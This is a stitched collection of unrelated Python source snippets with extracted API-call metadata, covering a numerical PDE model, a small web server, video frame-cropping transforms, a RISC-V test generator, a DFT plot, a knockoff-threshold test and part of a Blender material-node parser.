dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
| [
"dapy.models.transforms.fft.irfft",
"dapy.models.transforms.rfft_coeff_to_real_array",
"numpy.exp",
"dapy.integrators.etdrk4.FourierETDRK4Integrator",
"numpy.zeros",
"dapy.models.transforms.real_array_to_rfft_coeff",
"numpy.arange"
]
| [((6910, 6989), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', (['(state_noise_kernel + 1.0j * state_noise_kernel)', '(False)'], {}), '(state_noise_kernel + 1.0j * state_noise_kernel, False)\n', (6934, 6989), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((7244, 7331), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', (['(initial_state_kernel + 1.0j * initial_state_kernel)', '(False)'], {}), '(initial_state_kernel + 1.0j * initial_state_kernel,\n False)\n', (7268, 7331), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((7658, 7899), 'dapy.integrators.etdrk4.FourierETDRK4Integrator', 'FourierETDRK4Integrator', ([], {'linear_operator': 'linear_operator', 'nonlinear_operator': 'nonlinear_operator', 'num_mesh_point': 'dim_state', 'domain_size': 'domain_extent', 'time_step': 'time_step', 'num_roots_of_unity': 'num_roots_of_unity_etdrk4_integrator'}), '(linear_operator=linear_operator, nonlinear_operator\n =nonlinear_operator, num_mesh_point=dim_state, domain_size=\n domain_extent, time_step=time_step, num_roots_of_unity=\n num_roots_of_unity_etdrk4_integrator)\n', (7681, 7899), False, 'from dapy.integrators.etdrk4 import FourierETDRK4Integrator\n'), ((6761, 6824), 'numpy.exp', 'np.exp', (['(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'], {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)\n', (6767, 6824), True, 'import numpy as np\n'), ((7093, 7156), 'numpy.exp', 'np.exp', (['(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'], {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)\n', (7099, 7156), True, 'import numpy as np\n'), ((8434, 8453), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8442, 8453), True, 'import numpy as np\n'), ((8737, 8769), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', (['states'], {}), '(states)\n', (8761, 8769), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((8895, 8927), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', (['states'], {}), '(states)\n', (8919, 8927), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((6503, 6532), 'numpy.arange', 'np.arange', (['(dim_state // 2 + 1)'], {}), '(dim_state // 2 + 1)\n', (6512, 6532), True, 'import numpy as np\n'), ((7570, 7596), 'dapy.models.transforms.fft.irfft', 'fft.irfft', (['v'], {'norm': '"""ortho"""'}), "(v, norm='ortho')\n", (7579, 7596), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((8039, 8058), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8047, 8058), True, 'import numpy as np\n'), ((8177, 8196), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8185, 8196), True, 'import numpy as np\n')] |
# -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| [
"karlooper.web.application.Application",
"os.getcwd"
]
| [((930, 973), 'karlooper.web.application.Application', 'Application', (['url_mapping'], {'settings': 'settings'}), '(url_mapping, settings=settings)\n', (941, 973), False, 'from karlooper.web.application import Application\n'), ((768, 779), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (777, 779), False, 'import os\n'), ((810, 821), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (819, 821), False, 'import os\n')] |
import random
import math
class LoopPadding(object):
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30
offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14
begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29)
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | [
"random.randint"
]
| [((2430, 2457), 'random.randint', 'random.randint', (['(0)', 'rand_end'], {}), '(0, rand_end)\n', (2444, 2457), False, 'import random\n')] |
from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| [
"waiter.action.process_kill_request",
"waiter.util.guard_no_cluster"
]
| [((202, 228), 'waiter.util.guard_no_cluster', 'guard_no_cluster', (['clusters'], {}), '(clusters)\n', (218, 228), False, 'from waiter.util import guard_no_cluster, check_positive\n'), ((436, 537), 'waiter.action.process_kill_request', 'process_kill_request', (['clusters', 'token_name_or_service_id', 'is_service_id', 'force_flag', 'timeout_secs'], {}), '(clusters, token_name_or_service_id, is_service_id,\n force_flag, timeout_secs)\n', (456, 537), False, 'from waiter.action import process_kill_request\n')] |
# See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
global ramdomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
| [
"riscv_isac.cgf_normalize.expand_cgf",
"os.path.exists",
"os.path.join",
"shutil.copytree",
"riscv_ctg.log.logger.level",
"riscv_ctg.utils.load_yaml",
"multiprocessing.Pool",
"time.time",
"riscv_ctg.generator.Generator",
"riscv_ctg.log.logger.info"
]
| [((2340, 2361), 'riscv_ctg.log.logger.level', 'logger.level', (['verbose'], {}), '(verbose)\n', (2352, 2361), False, 'from riscv_ctg.log import logger\n'), ((2458, 2524), 'riscv_ctg.log.logger.info', 'logger.info', (['"""Copyright (c) 2020, InCore Semiconductors Pvt. Ltd."""'], {}), "('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')\n", (2469, 2524), False, 'from riscv_ctg.log import logger\n'), ((2529, 2564), 'riscv_ctg.log.logger.info', 'logger.info', (['"""All Rights Reserved."""'], {}), "('All Rights Reserved.')\n", (2540, 2564), False, 'from riscv_ctg.log import logger\n'), ((2569, 2623), 'riscv_ctg.log.logger.info', 'logger.info', (['"""Copying env folder to Output directory."""'], {}), "('Copying env folder to Output directory.')\n", (2580, 2623), False, 'from riscv_ctg.log import logger\n'), ((2638, 2662), 'os.path.join', 'os.path.join', (['out', '"""env"""'], {}), "(out, 'env')\n", (2650, 2662), False, 'import os, re\n'), ((3317, 3353), 'riscv_ctg.utils.load_yaml', 'utils.load_yaml', (['const.template_file'], {}), '(const.template_file)\n', (3332, 3353), True, 'import riscv_ctg.utils as utils\n'), ((3364, 3406), 'riscv_isac.cgf_normalize.expand_cgf', 'expand_cgf', (['cgf_file', 'xlen', 'list_duplicate'], {}), '(cgf_file, xlen, list_duplicate)\n', (3374, 3406), False, 'from riscv_isac.cgf_normalize import expand_cgf\n'), ((3416, 3434), 'multiprocessing.Pool', 'mp.Pool', (['num_procs'], {}), '(num_procs)\n', (3423, 3434), True, 'import multiprocessing as mp\n'), ((1739, 1810), 'riscv_ctg.generator.Generator', 'Generator', (['formattype', 'op_node', 'opcode', 'randomize', 'xlen', 'flen', 'base_isa'], {}), '(formattype, op_node, opcode, randomize, xlen, flen, base_isa)\n', (1748, 1810), False, 'from riscv_ctg.generator import Generator\n'), ((2673, 2696), 'os.path.exists', 'os.path.exists', (['env_dir'], {}), '(env_dir)\n', (2687, 2696), False, 'import os, re\n'), ((2706, 2741), 'shutil.copytree', 'shutil.copytree', (['const.env', 'env_dir'], {}), '(const.env, env_dir)\n', (2721, 2741), False, 'import shutil\n'), ((2845, 2856), 'time.time', 'time.time', ([], {}), '()\n', (2854, 2856), False, 'import time\n')] |
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| [
"matplotlib.pyplot.savefig",
"numpy.ones",
"numpy.arange",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.figure",
"dftModel.dftAnal",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.title",
"sys.path.append",
"dftModel.dftSynth",
"matplotlib.pyplot.show"
]
| [((63, 107), 'sys.path.append', 'sys.path.append', (['"""../../../software/models/"""'], {}), "('../../../software/models/')\n", (78, 107), False, 'import sys\n'), ((164, 174), 'numpy.ones', 'np.ones', (['N'], {}), '(N)\n', (171, 174), True, 'import numpy as np\n'), ((229, 249), 'dftModel.dftAnal', 'DFT.dftAnal', (['x', 'w', 'N'], {}), '(x, w, N)\n', (240, 249), True, 'import dftModel as DFT\n'), ((254, 277), 'dftModel.dftSynth', 'DFT.dftSynth', (['mX', 'pX', 'N'], {}), '(mX, pX, N)\n', (266, 277), True, 'import dftModel as DFT\n'), ((279, 310), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {'figsize': '(9.5, 5)'}), '(1, figsize=(9.5, 5))\n', (289, 310), True, 'import matplotlib.pyplot as plt\n'), ((311, 327), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(311)'], {}), '(311)\n', (322, 327), True, 'import matplotlib.pyplot as plt\n'), ((328, 384), 'matplotlib.pyplot.title', 'plt.title', (['"""positive freq. magnitude spectrum in dB: mX"""'], {}), "('positive freq. magnitude spectrum in dB: mX')\n", (337, 384), True, 'import matplotlib.pyplot as plt\n'), ((474, 490), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(312)'], {}), '(312)\n', (485, 490), True, 'import matplotlib.pyplot as plt\n'), ((491, 537), 'matplotlib.pyplot.title', 'plt.title', (['"""positive freq. phase spectrum: pX"""'], {}), "('positive freq. phase spectrum: pX')\n", (500, 537), True, 'import matplotlib.pyplot as plt\n'), ((584, 621), 'matplotlib.pyplot.axis', 'plt.axis', (['[0, pX.size, -np.pi, np.pi]'], {}), '([0, pX.size, -np.pi, np.pi])\n', (592, 621), True, 'import matplotlib.pyplot as plt\n'), ((621, 637), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(313)'], {}), '(313)\n', (632, 637), True, 'import matplotlib.pyplot as plt\n'), ((638, 676), 'matplotlib.pyplot.title', 'plt.title', (['"""inverse spectrum: IDFT(X)"""'], {}), "('inverse spectrum: IDFT(X)')\n", (647, 676), True, 'import matplotlib.pyplot as plt\n'), ((762, 780), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (778, 780), True, 'import matplotlib.pyplot as plt\n'), ((781, 804), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""idft.png"""'], {}), "('idft.png')\n", (792, 804), True, 'import matplotlib.pyplot as plt\n'), ((805, 815), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (813, 815), True, 'import matplotlib.pyplot as plt\n'), ((394, 412), 'numpy.arange', 'np.arange', (['mX.size'], {}), '(mX.size)\n', (403, 412), True, 'import numpy as np\n'), ((547, 565), 'numpy.arange', 'np.arange', (['pX.size'], {}), '(pX.size)\n', (556, 565), True, 'import numpy as np\n'), ((686, 710), 'numpy.arange', 'np.arange', (['(-N / 2)', '(N / 2)'], {}), '(-N / 2, N / 2)\n', (695, 710), True, 'import numpy as np\n'), ((199, 223), 'numpy.arange', 'np.arange', (['(-N / 2)', '(N / 2)'], {}), '(-N / 2, N / 2)\n', (208, 223), True, 'import numpy as np\n')] |
import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
| [
"fanok.selection.adaptive_significance_threshold",
"pytest.mark.parametrize",
"numpy.array"
]
| [((98, 480), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""w, q, offset, expected"""', '[([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1,\n 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, \n 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], \n 0.15, 0, 3), ([-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, \n 0.31, -1.38], 0.1, 0, 1.93)]'], {}), "('w, q, offset, expected', [([1, 2, 3, 4, 5], 0.1, 0,\n 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0,\n np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), (\n [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ([-1.52, \n 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93)])\n", (121, 480), False, 'import pytest\n'), ((662, 673), 'numpy.array', 'np.array', (['w'], {}), '(w)\n', (670, 673), True, 'import numpy as np\n'), ((690, 742), 'fanok.selection.adaptive_significance_threshold', 'adaptive_significance_threshold', (['w', 'q'], {'offset': 'offset'}), '(w, q, offset=offset)\n', (721, 742), False, 'from fanok.selection import adaptive_significance_threshold\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#格式化
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | [
"bs4.BeautifulSoup",
"requests.get"
]
| [((175, 192), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (187, 192), False, 'import requests\n'), ((227, 248), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.text'], {}), '(r.text)\n', (240, 248), False, 'from bs4 import BeautifulSoup\n')] |
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
